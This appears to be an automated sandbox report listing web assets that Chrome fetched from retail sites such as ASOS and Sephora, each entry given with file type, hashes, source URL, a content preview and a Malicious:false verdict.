                                                                                                                                                                                                                                                                                      Preview:{. "name": "",. "icons": [. {. "src": "/android-chrome-192x192.png",. "sizes": "192x192",. "type": "image/png". },. {. "src": "/android-chrome-512x512.png",. "sizes": "512x512",. "type": "image/png". }. ],. "theme_color": "#0E0F0F",. "background_color": "#0E0F0F".}
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (4450)
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):4522
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.306364650524668
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:vSIm3eWWY4emHvJwe+QRQJCNuN2W2K2EXR5hDV2OmGi7kA2Wn6:vIgZhwepRQYgYlhEXR5hDVEGiF2Wn6
                                                                                                                                                                                                                                                                                      MD5:3C8F93FEC24C564BD9DDFDA68827666A
                                                                                                                                                                                                                                                                                      SHA1:968CA6A78637C83D539D5603BF8FDAFD72C1E4A6
                                                                                                                                                                                                                                                                                      SHA-256:EE6F5A3E3C885FEDD52B015CAB0F1847A86805DCE43723C9F6550D98BC2FCA03
                                                                                                                                                                                                                                                                                      SHA-512:4B07C8D575FCF286C734E85CF336821D1EECD2093838BB9394CF76B3CD7CD6811E75D79581ECBA80961A8AD605525123DC94CA859256CEF846F4EF1491F3B927
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://resources.asosservices.com/res/analytics/homepage.sitechrome.js
                                                                                                                                                                                                                                                                                      Preview:// 1.0.572.require(["jquery"],function($){function onCarouselAction(){var overrides;void 0===window.analyticsCarouselAction&&(s=s_gi(s.account),(overrides={}).linkTrackVars=commons.setLinkTrackVars(["prop40"]),overrides.linkTrackEvents=commons.setLinkTrackEvents(["event120"]),s.prop40=(arguments[1].carouselType+"|"+arguments[1].componentName).toLowerCase(),s.events="event120",s.tl(!0,"o","homepage|"+arguments[1].context,overrides),window.analyticsCarouselAction=1)}var commons=new CommonAnalytics({"tracking.homePage.carouselAction":function(){},"tracking.homePage.pageLoad":function(){}});window.asos.eventBus.emit("analytics-ready");window.asos.eventBus.addListener("tracking.homePage.carouselAction",onCarouselAction),$(window).on("tracking.homePage.carouselAction",onCarouselAction),__trackingData={},window.asos&&window.asos.contentTargeting&&document.body.querySelectorAll("[data-targeted-content-item]").length?window.asos.contentTargeting.subscribe(function(data){__trackingData.targeting
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):48316
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                                                                                      MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                                                                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                                                                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                                                                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                                                                                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (17577)
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):17672
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.210199101660777
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:iwvGdN1cMU8QatLePlko998Vp3AIgujHrEDO11yy1plMW2IP4VldNr1:ZGSMU8qPlko998PQIg0HrEDM1yy1plRE
                                                                                                                                                                                                                                                                                      MD5:34F15782047F9D678A947BF675E8A3D8
                                                                                                                                                                                                                                                                                      SHA1:6034D6A3106350EEC176759ECF57C7E8551ADF3F
                                                                                                                                                                                                                                                                                      SHA-256:0C8A9732467A1684679DE0BB5A979468FC31123212AC1F936F7F2CC653E90B29
                                                                                                                                                                                                                                                                                      SHA-512:27DEACE81F42CA5B0EDE5A0EFB534D17B86A51730E6C8776B148CBD5759A5FAE158B6CDE1F04F373B5ED2BC7BCAACF17369BDD302D47F112ADBD5755CC58165B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://assets.asosservices.com/shared/require.7c30e08a.js
                                                                                                                                                                                                                                                                                      Preview:/*! v2.2.0, license file: require.LICENSE.txt */.var requirejs,require,define;!function(global){var req,s,head,baseElement,dataMain,src,interactiveScript,currentlyAddingScript,mainScript,subPath,version="2.2.0",commentRegExp=/(\/\*([\s\S]*?)\*\/|([^:]|^)\/\/(.*)$)/gm,cjsRequireRegExp=/[^.]\s*require\s*\(\s*["']([^'"\s]+)["']\s*\)/g,jsSuffixRegExp=/\.js$/,currDirRegExp=/^\.\//,op=Object.prototype,ostring=op.toString,hasOwn=op.hasOwnProperty,isBrowser=!("undefined"==typeof window||"undefined"==typeof navigator||!window.document),isWebWorker=!isBrowser&&"undefined"!=typeof importScripts,readyRegExp=isBrowser&&"PLAYSTATION 3"===navigator.platform?/^complete$/:/^(complete|loaded)$/,defContextName="_",isOpera="undefined"!=typeof opera&&"[object Opera]"===opera.toString(),contexts={},cfg={},globalDefQueue=[],useInteractive=!1;function commentReplace(e,t,i,r){return r||""}function isFunction(e){return"[object Function]"===ostring.call(e)}function isArray(e){return"[object Array]"===ostring.cal
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 80284, version 1.590
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):80284
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.996820470704193
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:1536:pNWK9e/XWghzVGbm5mj9HWlfYoGqjzD+F9hT1b5bqMCAB1Rov6K1P:pgkefdsmUj+fYKKFnT1bxqMCAB1SNZ
                                                                                                                                                                                                                                                                                      MD5:C928F3743528E38AB3E452F66DACDDA5
                                                                                                                                                                                                                                                                                      SHA1:BCB91E0E5546FFCCAEAA67FCF6BBCFB71EC14CF4
                                                                                                                                                                                                                                                                                      SHA-256:1074381C79236111C60C6FDA4FDF71B2B3780D22AA08500784678A2C958FE14F
                                                                                                                                                                                                                                                                                      SHA-512:FF40B3FA0C009699EFCFB4B07765FA7AB8D3C2BA189BE5444B745F72DCF50A0EDFFD0E242D186E95C90AA4B49E2E701EA66E06B8D1CFDB39395919CE26A5468F
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://assets.asosservices.com/fonts/futura-pt/bold.11074381.woff2
                                                                                                                                                                                                                                                                                      Preview:wOF2......9........(..93...N.......................\.....r.`....$..a.....(..Q...X.6.$..8..<.. ..7..s..v[....b.n...e...J...L..P(u....u.r.j.h......:..A....@Y.d............w2..J.>K....7h!@..cm.u.A.<.y.!DJJ1G.....*.P......Q.D.56.Z:....TK..4.._.y.J.....N.v....:$O?B(..&...b..A}1.z.E.v8.8..v...0..I<yo.x.....,......[....Si.+.^.w^:A.4H.jI...y.......F.O.cY.jo.%..^z...Mb.....!{......[.LJ. {....JV.q..0P..L......dW.....?........t..`..=.+...O.o_Y..iM[..........J.......O..J..!....X...[. ...N^8.....cE55.I..rf.,.E...a....}..VU..-..#.....7..Sa._Oo..[V...'...C...d._..X.V...T..2T..Q......."2T.a...g8...4.. .o...z)W.....<.{w.....FF=..H.?Ewt-..~r...q..@H..j...&D.J).\...At.}d.... ~...........%....-.5FMJ.|.`.5h....h.......e%b~.j....[#$.lj0.l...1.GH./.%*"Q.T.6.,.a bQ.&..P.#_A.|.....{......).I.J.th.*..f..4.k@..zcw.6..L..(..'i.a.*.r..3.)T...*.T ..(4......m. T.].t."..&..V...R.%.4.Nv..O.....Yj<.2.@`j-..."_.'UD..H.......|D..t.....-}..A..t.I#..e......eN6K.X!.B..} .um..2U;..;w.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):3810
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.943543789912295
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:OIQMcJ3Snkq1Zx9/1YFKaFA1TapnwrSInCf51SG/:zQdikqPx9aHA1TapnwHnQr5
                                                                                                                                                                                                                                                                                      MD5:B4A4AEEF41EE413911BDF53724431511
                                                                                                                                                                                                                                                                                      SHA1:F84E97D881DD1D90C191103EA1715D5A646D319F
                                                                                                                                                                                                                                                                                      SHA-256:3B672FA58CC2E0A0A21C7AEE6E5D8B9A3CB8BA2C7692BEFB7E69EC29F24B895F
                                                                                                                                                                                                                                                                                      SHA-512:AE1BF7ABC4D1FC615191C2BEEAA63E3CD8DD100666D3BAE99CDA7F6F19AC473B2997C772D2BE0924707030A6269E6EE43284D47F9B2BE3986F99E8F3C3FA765B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://assets.asosservices.com/storesa/images/flags/gb.png
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...P...P............sRGB.........IDATx..].tT.......2!;.......U+..bm......ZA..B.[.."...R.....R==...'.S[.EK8.e5..I.@....:....af2.Kf.v.?gr.w..........P...nO<.0~.Ec..".c.Z......2..U..b....I..*.vM~.$.#.Qs.F..vD.....,...4.L.....jll....e.......O..###OGGG....=d4..2.-.+(.U)i.kh......Emm.\Y.c.t..J.~...Fh$2.....k...!.rm.]...............]...hB$Ij....6k.[t.w..Fs..)...#pTV.......+.m...}.P;**....D\Sh...tj..L.t.....k6].|....E~7.t'..m!..@R.t>.-..|$.=..F..%d5.&YN..r.xt.%$$....T9.t..ug/&W}....jjjh.........2..7..a;...6o.....=@..g.|y. O...c...4l....+9...,.)..x....A.........Tj..E..."7(...T.^.BP..,./%m..ck%...Hk..5.4bi6...Qnf.........?;..*O..:.;l".....%..+^$t.n....JO.t.R.N..L..fd...}....f..J.t(..b!O.^.....+t....,]...8!3..+?%[.2Q..u.L...jtc2.g].3...... .'pT.p2U|A6.t.....Z..{4.Z.t..`.&`.t..1k.P[y.w.............^...]`.H....;!....i....kH.s3....M6...I3.`.6`.DMTG ..s...S.4....9.1*.B"...................ML..9....90....... /p.>.... ........l|Wta.{..t.M..?.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2893
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.912925986158937
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:03cQdRHChzFYMl4FTpjPKEKTjdaLcI5G/60saAdikLRfJzVVwwYyaKxMdNzxzSFL:fQ+hz+Ml4TlKndatStHA8qBhVww3Md5s
                                                                                                                                                                                                                                                                                      MD5:C9D346C188F3406F1EDE034E90D5B5C1
                                                                                                                                                                                                                                                                                      SHA1:2EFC812A53CC7D79C9D64E309C4673D0067C07D1
                                                                                                                                                                                                                                                                                      SHA-256:C89F0F5DCDE39CA9E55FEA4859DE4FB69DDEEF96E935A59229899CACBDC633C6
                                                                                                                                                                                                                                                                                      SHA-512:43C0B13A21A94D5A8B81AF217B3675AC52D277A036DF03CBFCAB13E8D74EB784537F7A5311F0F71A248B3350E95DD2C3AF88D94191F519105162E28B0028799C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...P...P............sRGB.........IDATx..[l......_../`7.C.L ..T$...DB...).1.J..U.Z...>....V.".@T.T.E&"-Q.RJ($......X.{.......Yv....w....i<3.:..w.w.w.5.<.`0....6..#..w..,.N.q..........h...d...l.v.];.z<...z...,.....wD"...o;.[.~5=..U..u...t:.:::.._.q.WM._.C............^.,..._....1..Z..l.XH.$b..g.U..8.8'.Ib.H$.9.....e.tA..{...}..k.d ..\..]...]....#...`..{o.n...\.....\..... i....%...0MNN.7..,.n..m....Q..L".P......}..[..$C.JZ..........*.H.\:H.......$.2.ax1... .N....:<H]..|...Q..W...<.d6...J...g(.:<n.Y.Z.to.qJQ.2..A....g.}y....4...,t...X......B{...^+..f...BQf.....4.....v.R..9Zw.[d;........TCZ...Gv..ph._.hj.A2.u....9x.._..n2..F.d.+. .{nQ......Z.5@n.,.~..72.9.*....hw..m}........A......e". .O..3.*.T..tqf.p..;[.|9r1...@......$.g..t.5g~...r..iD...O...o.K..)..7~.w.S.#...y.d...).n6..g.H.J....R6..g...}...n{......e%.^.E.xFk].P..].....hc.qR....k...j2.. $or4|^..F...K...6..q.u1B~...(...9_.$VD.m^p$tV.g.9....]..\.K`.K.....g+m.g..m.` z:Wm....J.9).\..<H
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65450)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):696717
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.400373953164625
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12288:92I3au++0oitbe13WmfmFtvJ5/ps0TskQkaIeya:MI3a1+0oV3WmfmFtamdeya
                                                                                                                                                                                                                                                                                      MD5:6256A7BE50E6AFA38D5B3BB7C283B9EA
                                                                                                                                                                                                                                                                                      SHA1:10E717AE88868FDEC4089EE1805DBD43A3969698
                                                                                                                                                                                                                                                                                      SHA-256:B8B511D485140A7C53B27C79DCFA1E757C3945F48D5CBF3A08193295844DBAC0
                                                                                                                                                                                                                                                                                      SHA-512:77271ED8D8924E247E071858EE169F08C8172E95081DD21D01E0465108942124BA44CC0C0E4CB4ED1D7645E0DF411385B5B9DA44C38A6C17C58F39BD00B1AD43
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:/*! For license information please see vendors.d80e45b3529c947b8d3f.js.LICENSE.txt */.(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([[216],{93468:(e,t,n)=>{"use strict";var r=n(35582),o=n(72686),i=function(e,t){return i=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},i(e,t)};function a(e,t,n,r){return new(n||(n=Promise))((function(o,i){function a(e){try{c(r.next(e))}catch(e){i(e)}}function s(e){try{c(r.throw(e))}catch(e){i(e)}}function c(e){var t;e.done?o(e.value):(t=e.value,t instanceof n?t:new n((function(e){e(t)}))).then(a,s)}c((r=r.apply(e,t||[])).next())}))}function s(e,t){var n,r,o,i,a={label:0,sent:function(){if(1&o[0])throw o[1];return o[1]},trys:[],ops:[]};return i={next:s(0),throw:s(1),return:s(2)},"function"==typeof Symbol&&(i[Symbol.iterator]=function(){return this}),i;function s(s){return function(c){return function(s){if(n)throw new TypeEr
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):100412
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.096644112205646
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:9CzWQPSh6NVRsVlnwh6/IOR4NSmImmXkWEYTVR6V2vg:9CV4QVRsV5wh4IOR4NSmImmXBVR6VH
                                                                                                                                                                                                                                                                                      MD5:EF7774FA249793BC2949160E18B20230
                                                                                                                                                                                                                                                                                      SHA1:8008CF5FAB7221F786175295A1BD92D2CD2300F4
                                                                                                                                                                                                                                                                                      SHA-256:313620341B3116D31F740236061DD71FE25D58E3EC5D5CC5B008D362D53FACAD
                                                                                                                                                                                                                                                                                      SHA-512:C6BF223042C5680F5C01F77031B90C6BD9287E9EFC030EBF0B9322619904F81CCD7DE7D5154B6629E06ACE6564734563F3D129E37DBB9AB23AE23121CBF5D774
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://www.asos.com/assets/optimizely/datafiles/ShK2dzd7JQhz8jETx1Fkb.json
                                                                                                                                                                                                                                                                                      Preview:{"accountId":"19065870423","projectId":"19065870423","revision":"8833","attributes":[{"id":"19445413143","key":"browseCountry"},{"id":"19471622747","key":"locationCountryCode"},{"id":"19572524180","key":"recognised"},{"id":"19584103928","key":"platform"},{"id":"19679101399","key":"loggedIn"},{"id":"19720880074","key":"geoCountry"},{"id":"19952365849","key":"browseStore"},{"id":"20194331169","key":"affiliateId"},{"id":"20201651533","key":"identityAppClient"},{"id":"20202436670","key":"firstTimeVisitor"},{"id":"20212466535","key":"numberOfVisits"},{"id":"20234946677","key":"existingCustomer"},{"id":"20339120648","key":"cypress"},{"id":"21055600153","key":"identityRequestOrigin"},{"id":"21097923050","key":"appProductListingPage"},{"id":"21133402853","key":"isInStock"},{"id":"21139602000","key":"appSavedLists"},{"id":"21156991878","key":"app"},{"id":"21158820156","key":"visitPageCount"},{"id":"21189160222","key":"notBouncedVisit"},{"id":"21191190134","key":"language"},{"id":"21233360138","
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):1651
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.134836278727537
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:dvjGC2U8pq45Qog4RVgcj5d1Amxvy6xMXG7DVM:JGC2UN2lVImBx97DVM
                                                                                                                                                                                                                                                                                      MD5:6247637576BF7D9282AB8E5B3AEA7B0A
                                                                                                                                                                                                                                                                                      SHA1:BA01916A6FC2192610BAC7639F37828B2A3859EF
                                                                                                                                                                                                                                                                                      SHA-256:26315778F8A273A9F1D05C98A18B2F7F89327DAB9EB71111D39D8AF30127D8EF
                                                                                                                                                                                                                                                                                      SHA-512:CA04C095922B19E4BBC5B0BBFB3AB9CE6C857EEA0CBF8AA9338FAB73F6278DAAD7B096E03A9D8567498CD3627207A6E926B7FF41EE1C1548655193183AF470D2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://community.sephora.com/html/assets/img_community-logo.svg
                                                                                                                                                                                                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 435.2 1000 129.6"><path fill="none" d="M812.6 472.1c-2.2-20.1-27.4-18.6-32.2-18.6h-10.1V495c4.3.2 7.6.2 11.9.2 5.1 0 33 .7 30.4-23.1zM631.4 452.9c-28.7 0-44.9 21.2-44.9 47.1 0 26.1 16.2 47.1 44.9 47.1s44.9-21.2 44.9-47.1c0-26.1-16.4-47.1-44.9-47.1zM305.1 454.2h-10.8v44.3H307c11.4 0 34.8-1.1 33.5-23.5-.8-22.9-30.4-20.8-35.4-20.8zM944.3 458.3L924.9 519l39.9-.2-20.3-60.5"/><path d="M493.4 487.3h-62.8v-48.2h-19v122.4h19v-58h62.8v58h18.8V439.1h-18.8M308.1 438.7c-6.9-.2-20.9-.2-33.3-.2v122.9H294v-46.6c4.8 0 14.7-.4 22.7-.6 11.2-.2 40.4-5.8 40.2-39.5.3-38-41.8-36-48.8-36zm-1 59.8h-12.7v-44.3h10.8c5 0 34.5-2.2 35.4 20.7 1.2 22.5-22.1 23.6-33.5 23.6zM130.9 438.5l.2 122.9h77.1v-16h-57.9v-41.7h41c0-3.5-.2-8.6 0-15.3h-41v-33.5h57.9c-.2-9.7 0-16.4 0-16.4h-77.3zM18.8 468.5c0-20.1 26.6-20.9 42.3-8 5.4-15.5 5.8-16.6 5.8-16.6C21.1 421.9.2 451 .2 469.6c0 44.5 63.1 35 54 66.3-3.2 11.4-23.5 17.9-46.9 3.7-1.7 4.8-4.5 10.6-7.3 16.4 30.9 16.2 71 8.4 72.3-25
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):7428
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.005231740060425
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:Y12Qozqy/bDzp5LkuD8QAKnv+wrBANASYmharWsMx7lg9ruCnIz0byCvnHZsHUC/:ovuUas5kWHaAobNVJR3jTPA
                                                                                                                                                                                                                                                                                      MD5:8C6E299CCBB39146BE4961946B751B48
                                                                                                                                                                                                                                                                                      SHA1:198F809C5A32A0886C0042B6839EF2772F0A7D17
                                                                                                                                                                                                                                                                                      SHA-256:A3FFB2DA5B6ACABBA996BC1B13A9B8F1C50C1B74D6525769E9A610C90F1F2BC2
                                                                                                                                                                                                                                                                                      SHA-512:47BAB09E2A8669024338C93A335AD7BE1AC477E2A5B19012AB2F9008B0704662E95314926ED98F7C4B7A1627E8E65B5B9980343CE4B132B56A61F2EF3531350D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:"https://c.go-mpulse.net/api/config.json?key=KEKMC-5QPEH-Y5FHE-8AH54-JDSN3&d=www.asos.com&t=5766025&v=1.766.0&sl=0&si=bd1f9cdd-48f7-431f-b5a6-b13cb18ac134-slvs3x&plugins=AK,ConfigOverride,Continuity,PageParams,IFrameDelay,AutoXHR,SPA,History,Angular,Backbone,Ember,RT,CrossDomain,BW,PaintTiming,NavigationTiming,ResourceTiming,Memory,CACHE_RELOAD,Errors,TPAnalytics,UserTiming,Akamai,Early,EventTiming,LOGN&acao=&ak.ai=243464"
                                                                                                                                                                                                                                                                                      Preview:{"h.key":"KEKMC-5QPEH-Y5FHE-8AH54-JDSN3","h.d":"asos.com","h.t":1729807636006,"h.cr":"a387b4c21cdc3d4480cb2f025933fd6c0d7dd487-e6f7476a-c58388ad","session_id":"2a741c90-c15a-4741-ad5f-9ff5e6d0d0dd","site_domain":"asos.com","beacon_url":"//684dd329.akstat.io/","autorun":true,"instrument_xhr":true,"strip_query_string":true,"beacon_interval":60,"BW":{"enabled":false},"RT":{"session_exp":1800},"ResourceTiming":{"enabled":true,"splitAtPath":true},"Continuity":{"enabled":true,"waitAfterOnload":2000},"PageParams":{"xhr":"match","pageGroups":[{"type":"Regexp","parameter1":".*/.*/cat/\\?","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/search($|/|\\?)","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/brand-error/","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/brand-unavailable/","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/prd/","parameter2":"PDP","on":["navigation"]},{"type":
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2653
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.900682567288321
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:kZ84RnYgjr0w4tOEynSRblVnu1x3cGoCvk5eInf0k1rN77E1Kts2Je5+jA:G842gjTUOEynoblVixsGoCvnI1dNHsK4
                                                                                                                                                                                                                                                                                      MD5:89EB6DDFF46C123B5C50319133679DB1
                                                                                                                                                                                                                                                                                      SHA1:BD2958D629362A7A7EE2AE53314FB3F1AD6FFE4A
                                                                                                                                                                                                                                                                                      SHA-256:D4225FEDA05C04710EC2ACE67EADEDDEB533530B3D43A7D287CE82838D18E224
                                                                                                                                                                                                                                                                                      SHA-512:AACB75914C2C7E0FE6FF63CF81F606BC7DE4BCDB26D10E69102F97AE75203A75A85FB17F244ABA831023593067A4497E08AD1D97A1762EDA02595E666CBE091D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...P...P............sRGB.........IDATx..[l........]{}I..8!q...6....A....Q..B...E..U....9/}).....DT)...GjU@T*.Aj..@...:W........K..Y...zwg.B...83;s......9.*l.-..]=..+...-..P*..=..>.c.ucLa1.=.%..$.EM0.Or54......1C.}..[.L....f^..;rub.D2.'1..!`;\.0..'....k..~V..i!...M[.=......T.....,..u...;.1k.g......z4.Y8D.....>p.)F...q..a...:..c.c3....l.9.)..[....?kz.....KQ.. @.?|c......./=q.z...v.e.#a.:.U...Y...0.w..g2..-.:V.9......x\U.p.[.w....~XH:..........j:~>..i.P.r.q0.+..Cc.T*iT.*X....B...f..Di.yj;.j.....^nt.n(.........F.ig........$........R..2.sT*3......}..O....Ok@...vkr~z.O.%x.\.F.u...2.05...v. g.v.P.G....m...G'..Xo.*.'..o.....+.P&......m...+...0.....n.1!.s..."..a..\3...9...._.....s...GX...mX.....f...(....<"..3....Rk.5....k.>..g..R...0....h`[k>nZ<..y........M.d.j.;...<....wl.n...^qgk..J.Ai4(...-..m..*.;...P.....c}GQu...2...^s.G..Z............~...Z...Fl#.jC:.j.... .. .6h..$....aqf...^.I.;..Q..I.&...~.DO..O^<....=..zF..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2720
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.884700522511444
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:cQxqHcyIcghgMGaZ+HP3Js3XFGMST8BQL9ZUEdK9RjgJhTStYqEZaukPxN:cQxPyI+aZ+HPKfBei9qTeYqqaV
                                                                                                                                                                                                                                                                                      MD5:967AD8D31ECFDA30A1074119C56E0BD5
                                                                                                                                                                                                                                                                                      SHA1:E9E24D19C7BC47406BF1F5679E852C2F0E9FE0BF
                                                                                                                                                                                                                                                                                      SHA-256:E68FD0833CC79262442BA6D28E16CDF9D5C09BD013A12D5D8AE4B60EFCFBAF05
                                                                                                                                                                                                                                                                                      SHA-512:F1F8DD292A8D830D0FC3FDA80DA5E78065747AFC7BBE8025D97FEDCE2C858E2009C5646447F4EAE0233D9A92C11659AA90FE4E434D5FD727253722BA0AF3D0FF
                                                                                                                                                                                                                                                                                      Malicious:false
